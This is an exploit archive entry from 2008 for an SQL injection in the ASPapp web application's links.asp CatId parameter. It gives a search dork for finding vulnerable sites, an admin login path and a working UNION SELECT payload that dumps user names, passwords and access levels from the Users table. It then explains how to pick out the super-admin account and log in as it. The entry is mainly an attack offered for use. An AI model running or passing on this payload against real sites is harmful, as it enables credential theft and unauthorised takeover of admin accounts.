ASPapp (links.asp CatId) Remote SQL Injection Vulnerability

2008-03-19T00:00:00
ID 1337DAY-ID-2752
Type zdt
Reporter xcorpitx
Modified 2008-03-19T00:00:00

Description

Exploit for unknown platform in category web applications

                                        
                                            ===========================================================
ASPapp (links.asp CatId) Remote SQL Injection Vulnerability
===========================================================



..##.....##     
...##...##      
....##.##
.....###CoRPITX 
.....###     
....##.##
...##...##
..##.....##

-----------------Turkey--------------------------------------
                                               
Iatek | ASPapp -links.asp (CatId) SQL Injection Vulnerability 
-------------------------------------------------
 you ll see lots of users like this but  accesslevel ll help you for see admin
-------------------------------------------------------------
----------------example--------------------------------------

Links › guest  ›  12    › 1     user
Links › editor › editor › 2     materator
Links › manager› manager› 2     materator
Links › surco  › surco  › 2     materator
Links › admin  › admin  › 3     admin
Links › ovivas › ovivas › 4     super-admin----- we  ll login with this username
-------------------------------------------------------------

-------------------------------------------------------------
i mean.. when you see  big number  4 or 5  you can  use this username and password
-------------------------------------------------------------

-------
dork   -  ''links.asp?CatId''
-------
exploit-
-------
admin login- 
-------
www.xxx.com/path/login.asp?ret_page=%2Fzmicer%2Fweb%2Fadmin%2Easp%3F
-------
-------------------------------------------------------------
links.asp?CatId=-99999%20UNION%20SELECT%20null,accesslevel,null,null,user_name,%205%20,password,null%20FROM%20Users
-------------------------------------------------------------



#  0day.today [2018-01-05]  #